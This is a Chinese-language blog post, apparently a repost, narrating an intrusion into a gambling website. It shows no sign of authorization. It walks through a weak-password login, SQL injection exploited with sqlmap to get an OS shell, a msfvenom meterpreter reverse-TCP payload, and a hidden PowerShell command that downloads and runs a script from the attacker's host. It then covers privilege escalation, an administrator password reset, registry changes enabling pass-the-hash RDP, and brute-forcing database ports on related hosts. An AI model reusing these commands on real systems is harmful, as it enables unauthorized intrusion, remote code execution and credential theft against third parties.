实战!记一次对某菠菜的简单测试_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

实战!记一次对某菠菜的简单测试

发布日期:2024-05-19 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


实战!记一次对某菠菜的简单测试

0x00 前言 闲着无聊,网上找了一个菠菜进行简单测试,并做记录,大佬们轻喷。 0x01 弱口令 访问网站就是一个登录页面,试试简单的弱口令admin/123456,直接进入后台。 0x02 SQL注入 翻看了很多功能点,在一处功能点发现上传接口,并尝试上传文件,发现无法上传,加了白名单。 直接选择放弃,继续寻找,在某一个url参数上加上单引号,直接报错,SQL注入这不就来了么。 http://xxxxxx/xxxxx/GroupMember.aspx?gid=150198 说干就干,直接SQLMAP。 发现为MSSQL,且DBA权限,直接--os-shell 0x03 上线MSF msf生成powershell脚本,并放置在网站目录下 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=8888 -f psh-reflection >xx.ps1 Vps开启监听 直接powershell上线session powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/xx.ps1'))" 如果想要通过url拼接堆叠执行powershell会存在一个问题,就是单引号闭合问题;我们可以通过对powershell进行编码一下,这样就可以绕过单引号的问题。 下面推荐一个不错的网站: https://r0yanx.com/tools/java_exec_encode/ 0x04 提权 直接getsystem获取system权限;如果需要提权推荐土豆家族提权,实战中成功率很高,影响的服务器版本也很多。 迁移一下进程,防止进程掉线。 0x05 远程登录服务器 发现服务器开启3389端口,因为是system权限,且为2012系统,大于2008版本都是无法抓到明文密码,直接修改adminnistrator密码。 已经成功登录进服务器,但在实战中不推荐直接修改管理员密码。 0x06 通过hash远程登录管理员账号 因为是win2012无法获取明文密码,直接修改管理员密码稍有些不妥;我们也可以尝试通过获取管理员NTLM远程登录机器。 与测试目标并非同一台,这只是提供一个思路! 如果使用hash远程登录RDP,需要开启"Restricted Admin Mode" //开启Restricted Admin modeREG ADD "HKLMSystemCurrentControlSetControlLsa" /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //查看是否已开启0x0则表示开启REG query "HKLMSystemCurrentControlSetControlLsa" | findstr "DisableRestrictedAdmin" 成功远程管理员桌面 0x07 其他 前期发现1433端口开放着,寻找数据库配置文件,登录数据库。 通过fofa找了一下,资产还是挺多的,且很多都开放1433端口,猜测会存在同一个人部署的网站。 尝试用获取的密码对这些资产的1433端口进行爆破,成功撞到几台数据库,且都是sa权限,结束!!! 文章来源:潇湘信安 黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担! 如侵权请私聊我们删文 END

实战!记一次对某菠菜的简单测试